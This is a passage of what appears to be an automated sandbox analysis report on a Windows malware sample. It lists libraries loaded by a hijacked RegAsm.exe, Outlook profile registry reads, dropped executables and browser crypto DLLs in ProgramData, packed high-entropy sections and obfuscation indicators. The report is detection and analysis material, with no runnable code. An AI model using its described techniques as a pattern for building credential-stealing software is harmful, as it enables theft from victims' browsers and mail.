Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: version.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\DHCGHDHIDH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: version.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\HDAFIIDAKJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004195E0

PE file contains an invalid checksum

Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: DHCGHDHIDH.exe.29.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: real checksum: 0x377ad should be: 0x35e97
Source: userFBKFCFBFID.exe.3.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3
Source: sql[1].dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe	Static PE information: real checksum: 0x3ca22 should be: 0x3ef0c
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: real checksum: 0x552b7 should be: 0x53da3

PE file contains sections with non-standard names

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.29.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.29.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.29.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.29.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A9F5 push ecx; ret	3_2_0041AA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B536 push ecx; ret	3_2_6CB7B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0043504B push ss; retf	24_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041AA05 push ecx; ret	29_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB536 push ecx; ret	29_2_6C9EB549

Source: file.exe	Static PE information: section name: .text entropy: 7.986877735993568
Source: userFBKFCFBFID.exe.3.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: 66cf818156193_ldjfnsfd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: userIEHDAFHDHC.exe.3.dr	Static PE information: section name: .text entropy: 7.985801528758324
Source: 66cf75d3791d7_vrewqgq[1].exe.3.dr	Static PE information: section name: .text entropy: 7.985801528758324
Source: DHCGHDHIDH.exe.29.dr	Static PE information: section name: .text entropy: 7.993781178446662
Source: HDAFIIDAKJ.exe.29.dr	Static PE information: section name: .text entropy: 7.985801528758324

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userFBKFCFBFID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userIEHDAFHDHC.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDAFIIDAKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DHCGHDHIDH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDAFIIDAKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DHCGHDHIDH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004195E0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
